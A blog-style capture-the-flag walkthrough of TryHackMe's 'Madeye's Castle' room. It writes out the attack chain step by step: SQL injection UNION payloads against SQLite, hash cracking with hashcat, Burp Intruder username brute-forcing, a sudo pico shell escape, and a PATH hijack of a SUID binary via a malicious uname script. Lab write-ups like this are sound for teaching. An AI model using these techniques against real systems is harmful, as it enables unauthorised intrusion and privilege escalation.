Feb 3, 2021
TryHackMe: Madeyes Castle writeup/walkthrough
Writeup/tutorial for the room ‘Madeye’s Castle’ on TryHackMe
Room Link | Medium difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>Task 1: Capture the flags
nmap -A <Machine_IP>
The nmap result had smb so we can try smbclient on the IP.
smbclient -N //<Machine_IP>//sambashare
ls
get .notes.txt
get spellnames.txtReading through the notes gave me 2 hints that the owner of the file is not using rockyou.txt, but maybe spellnames.txt
The other hint is that Hermonine (Yep, that’s what the spelling was) loves using a historical text editor.
Going to the http://<Machine_IP>:80 shows us the Apache2 Ubuntu default page but if we view it’s source, we can see that it is using virtual hosting on hogwartz-castle.thm
Let’s add the IP and virtual hosting address to /etc/hosts file to see if we can get a webpage.
sudo nano /etc/hosts
# Append the below as shown in picture
<Machine_IP> hogwartz-castle.thm
If you go to hogwartz-castle.thm in your browser (Click yes on the prompt bar that shows up to take you to http://hogwartz-castle.thm), you’ll see a login page.
Let’s try SQL injection by entering ‘ or 1=1 ;-- - in the username field and anything for password.
It says the following:
“The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection… keep digging”
Sqlmap was able to get me a table name and the database name but it wasn’t able to dump column values.
I moved to burp suite and tried to get the answers manually. I captured the request in burp suite and sent it to repeater.
I sent the request to repeater and tried some SQL injection. If you enter just an apostrophe in the username field, it will say internal error but if you add a comment the ‘-- - it will only say that username or password is incorrect so our SQL injection is working. Credit to Musyoka Ian as his writeup was really helpful.
I tried adding the following and it gave me a 500 internal error:
user='+union+select+1--+-&password=aI kept on adding more numbers and was able to get a 403 error using the following:
user='+union+select+sql,2,3,4--+-&password=a
If you see the right image above, it says 1 in the middle and 4 at the end. I added a string in place of 1 and it printed the string:
user='+union+select+'testing',2,3,4--+-
Now I can try checking the SQL version using(Source):
user='+union+select+sqlite_version(),2,3,4--+-&password=a
To enumerate further, I used the following:
user='+union+select+group_concat(tbl_name),2,3,4+FROM+sqlite_master+WHERE+type='table'+and+tbl_name+NOT+like+'sqlite_%'--+-&password=a
I tried password as the table name for this db:
user='+union+select+group_concat(password),2,3,4+FROM+users--+-&password=a
Using a wordlist, I was able to do a bruteforce attack to find other tables.
I used sublime’s text editor to remove extra text and find all instances of commas in the names files and created a wordlist out of it.
After going through the notes.txt file, there was nothing interesting like repeating sentences but there was 1 thing that gave a clue columns where someone said their password used best64. best64 is a rule in hashcat and john. We can use this rule for word mangling with hashcat to get some passwords from the hashes I just extracted. Earlier in our smb enumeration, I was able to recover a .notes.txt and a wordlist containing spells, so maybe we can create use that wordlist with the best64 rule.
In my passwords file, I used sublime’s find all features to get select all commas and just pressed enter so each hash was on a new line. I copied one of the hashes and used haiti to identify the type of hash. The same can be done with hash-identifier and they both said SHA-512.
I created a wordlist using the best64 rule with hashcat.
cp /usr/share/hashcat/rules/best64.rule ./hashcat --stdout -r /usr/share/hashcat/rules/best64.rule spellnames.txt > wordlist.txt
Using a GTX 1050 4gb and the wordlist I just created with hashcat, I was able to crack the hash instantly.
hashcat -m 1700 madeye-castle-hashes.txt wordlist.txt 
We now have 1 password but a lot of usernames so I started bruteforce attack using Intruder in Burp suite to find the username that matches this password. I sent my captured login POST request to intruder, copied the names from the file I removed spaces from and pasted them into burp suite and highlighted the username area and entered the password.
The attack showed that Harry Turner had the greatest response length but when checking the response, it said something about redirecting so I tried logging in manually with Harry Turner and the password we got.
It worked and it said the following:
The password for Harry Turner is incorrect! My linux username is my first name, and password uses best64
#1. User1.txt and User2.txt
Earlier in the nmap scan, we found an open ssh port so let’s try logging in there. I tried ssh with Harry as the user but it didn’t work so I tried it with harry(lowercase h) and it logged me in.
ssh harry@<Machine_IP>
<Enter harry's password>ls
cat user1.txt
sudo -l
Going to gtfobins, I was able to find the command to use for pico to elevate to hermonine’s privilege. Pico is a text editor and I believe the notes.txt in smb enumeration was hinting towards this editor.
sudo -u hermonine /usr/bin/pico
# Press Enter
# Press Ctrl+R
# Press Ctrl+X and then Enter the following commands:reset; sh 1>&0 2>&0
bash
clear
# After getting a shell with hermonine's privilege, we are currently in harry's directory and we need to go to hermonine's directory and get the user2.txt flag.cd ../hermonine
ls
cat user2.txt
#3. Root.txt
I used the find command to find other SUID’s that I could use to elevate privileges and the first one that stood out from the rest was called /srv/time-turner/swagger and the hint for root.txt mentioned you have to trick time so it would be a good guess that this has something to do with gaining root.
find / -perm -u=s -type f 2>/dev/null
If you run the swagger file, it asks for a number and you can almost never get it right. If you keep on running the file, it gives different results but if you send the output number of one as the next input, you get it correct!
# There is a space after of in the 'of ' (awk -F 'of ' '{print $2}')
echo '123' | /srv/time-turner/swagger | grep ‘of’ | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
The above command sends a number to the swagger binary and then greps ‘of’ so that we only have the last line (I tried other words but they were in both lines so only ‘of’ worked). I separated the text and the number using awk and selected the number and sent that back into the binary using a pipe. The answer it gives is of the command uname -p so we can make a malicious uname file and try to get a shell with root privileges and add the folder to the start of the PATH variable so it runs our malicious binary first. I tried adding ‘sudo -u root /bin/bash’ into the malicious uname binary but it didn’t work so I tried to get it to print the flag directly instead of getting root shell.
cd /tmp
echo ‘cat /root/root.txt’ > uname
chmod 777 uname
ls -la | grep uname
export PATH=/tmp:$PATH
echo $PATHecho '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
I would appreciate some claps and leave any responses if you have any questions. Follow me for more write-ups!
